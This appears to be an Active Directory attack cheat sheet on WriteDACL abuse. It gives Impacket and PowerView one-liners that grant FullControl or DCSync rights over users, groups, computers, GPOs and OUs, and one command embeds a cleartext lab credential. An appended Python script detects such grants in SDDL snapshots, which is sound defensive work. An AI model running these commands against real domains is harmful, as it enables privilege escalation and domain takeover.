WriteDACL
Information
With Write access to the target object’s DACL, you can grant yourself any privilege you want on the object.
Grant yourself FullControl of the user:
# Assigning FullControl permissions over the user with Impacket
impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3
# Assigning GenericAll permissions over the user with PowerView
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights All
See here for exploitation options.
Grant yourself FullControl of the group:
# PowerView
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembers
This can be leveraged to add members to the group (see here).
Grant yourself FullControl of the computer:
# Assigning GenericAll permissions over the computer
Add-DomainObjectAcl -TargetIdentity windows01 -Rights All
This can be leveraged to read the LAPS password or perform RBCD against the target host.
Grant yourself DCSync rights:
Add-DomainObjectAcl -TargetIdentity testlab.local -Rights DCSync
This can be leveraged to perform a DCSync attack.
Grant yourself FullControl of the GPO:
Add-DomainObjectAcl -TargetIdentity TestGPO -Rights All
This can be leveraged to edit the GPO and take over an object the GPO applies to.
Grant yourself FullControl of the OU:
Add-DomainObjectAcl -TargetIdentity <OU-GUID> -Rights All
This can be leveraged to add a new ACE to the OU that inherits down to child objects so we can then take over those child objects.
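To audit for the grants described above from the defender's side, the following added example (not part of the original page) compares two SDDL snapshots of an object's DACL and reports newly added allow ACEs that give control-level rights to a trustee outside an expected set. The `TRUSTED` aliases, the function names and the sample SID and SDDL strings are assumptions constructed for illustration.

```python
import re

# Control-level rights: SDDL code -> (name, access-mask bit).
RISKY = {"GA": ("GenericAll", 0x10000000), "GW": ("GenericWrite", 0x40000000),
         "WD": ("WriteDACL", 0x00040000), "WO": ("WriteOwner", 0x00080000)}
# Extended rights that together permit directory replication (DCSync).
DCSYNC = {"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
          "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All"}
# Assumption: SDDL aliases of trustees expected to hold these rights; tune per domain.
TRUSTED = {"DA", "EA", "BA", "SY", "ED"}

def dacl_aces(sddl):
    """Return the set of raw ACE strings in the DACL (D:) part of an SDDL string."""
    dacl = sddl.partition("D:")[2].partition("S:")[0]
    return set(re.findall(r"\(([^()]*)\)", dacl))

def grants(rights, object_guid):
    """Names of the control-level rights conveyed by an ACE's rights field."""
    if rights.lower().startswith("0x"):          # numeric access mask
        mask = int(rights, 16)
        return {name for name, bit in RISKY.values() if mask & bit}
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    found = {name for code, (name, _) in RISKY.items() if code in codes}
    if "CR" in codes:                            # control access (extended right)
        # No object GUID means every extended right; otherwise only flag DCSync ones.
        found.add(DCSYNC.get(object_guid.lower(), "") if object_guid else "AllExtendedRights")
    found.discard("")
    return found

def new_risky_aces(before, after, trusted=TRUSTED):
    """(trustee, rights) for allow ACEs added in `after` that give an untrusted trustee control."""
    findings = []
    for ace in sorted(dacl_aces(after) - dacl_aces(before)):
        f = ace.split(";")
        if len(f) < 6 or f[0] not in ("A", "OA") or f[5] in trusted:
            continue
        found = grants(f[2], f[3])
        if found:
            findings.append((f[5], sorted(found)))
    return findings

# Constructed sample data (fictional SID and descriptors).
SID = "S-1-5-21-1111111111-2222222222-3333333333-1105"
BEFORE = "O:DAG:DAD:AI(A;;GA;;;DA)(A;;GA;;;SY)(A;;RPLCRC;;;AU)"
AFTER_FULL = BEFORE + "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;" + SID + ")"
AFTER_DCSYNC = BEFORE + "".join("(OA;;CR;%s;;%s)" % (g, SID) for g in DCSYNC)

if __name__ == "__main__":
    for label, after in (("full control", AFTER_FULL), ("dcsync", AFTER_DCSYNC)):
        print(label, new_risky_aces(BEFORE, after))
```

Deny ACEs and callback ACE types are skipped, and ACEs inherited from a parent appear in the snapshot like any other, so an OU-level grant also shows up on the child objects it reaches.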